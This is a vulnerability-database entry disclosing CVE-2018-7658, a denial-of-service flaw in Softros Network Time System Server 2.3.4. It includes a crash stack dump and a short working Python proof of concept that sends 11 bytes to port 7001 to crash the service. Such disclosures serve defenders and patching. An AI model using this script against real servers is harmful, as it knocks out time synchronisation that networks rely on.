Lucene search
K

Softros Network Time System Server 2.3.4 - Denial of Service Exploit

🗓️ 06 Mar 2018 00:00:00Reported by hyp3rlinxType 
zdt
 zdt
🔗 0day.today👁 54 Views

Softros Network Time System Server version 2.3.4 Denial of Service vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
CNVD
Softros Network Time System Server Denial of Service Vulnerability
7 Mar 201800:00
cnvd
CVE
CVE-2018-7658
26 Mar 201821:00
cve
Cvelist
CVE-2018-7658
26 Mar 201821:00
cvelist
Exploit DB
Softros Network Time System Server 2.3.4 - Denial of Service
6 Mar 201800:00
exploitdb
exploitpack
Softros Network Time System Server 2.3.4 - Denial of Service
6 Mar 201800:00
exploitpack
NVD
CVE-2018-7658
26 Mar 201821:29
nvd
Packet Storm
Softros Network Time System Server 2.3.4 Denial Of Service
5 Mar 201800:00
packetstorm
Prion
Code injection
26 Mar 201821:29
prion
[+] Credits: John Page (aka hyp3rlinx)      
 
Vendor:
=============
www.softros.com
https://nts.softros.com/downloads/
 
 
Product:
===========
Network Time System Server v2.3.4 
Both x86/x64 versions
 
 
Network Time System provides a solution to system time maintenance problems. This powerful client/server software enables you to set up a
virtually fail-safe synchronized time environment for networks of any size and complexity, from small office networks (LAN) to those
maintained at large enterprises (VPN, VLAN, WAN), from single site networks to those including numerous domains and involving complex
routing techniques. Network Time System allows the creation of a custom source of precise time in a corporate network environment
establishing an interconnected time synchronization system for each and every machine and device on the company network.
 
 
Vulnerability Type:
===================
Denial Of Service
 
 
 
CVE Reference:
==============
CVE-2018-7658
 
 
Security Issue:
================
Network Time System (Server) "NTSServerSvc" service listens on Port 7001, unauthenticated remote attackers can crash the
Server by sending exactly 11 bytes to the target system. Systems which may depend on critical time synchronization 
could then potentially be impacted.
 
 
Stack dump:
 
'''
eax=0320119a ebx=0000000b ecx=000000ff edx=00000000 esi=03167040 edi=0050b328
eip=004069a5 esp=0447fee8 ebp=0447ff28 iopl=0         nv up ei ng nz ac pe cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010297
NTSServerSvc+0x69a5:
004069a5 880a            mov     byte ptr [edx],cl          ds:0023:00000000=??
Resetting default scope
 
FAULTING_IP: 
NTSServerSvc+69a5
004069a5 880a            mov     byte ptr [edx],cl
 
EXCEPTION_RECORD:  (.exr -1)
ExceptionAddress: 004069a5 (NTSServerSvc+0x000069a5)
   ExceptionCode: c0000005 (Access violation)
 
'''
 
 
Exploit/POC:
=============
import socket
#Network Time System (Server) NTSServerSvc.exe v2.3.4 
#Softros Systems
#NTS Server service for time synchronization over network
 
print 'Network Time Server 11 byte Denial Of Service'
print 'by hyp3rlinx'
HOST=raw_input('Network Time Server IP')
PORT=7001
payload='A'*11 
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((HOST,PORT))
s.send(payload)
s.close()

#  0day.today [2018-03-20]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

06 Mar 2018 00:00Current
7.5High risk
Vulners AI Score7.5
EPSS0.17994
54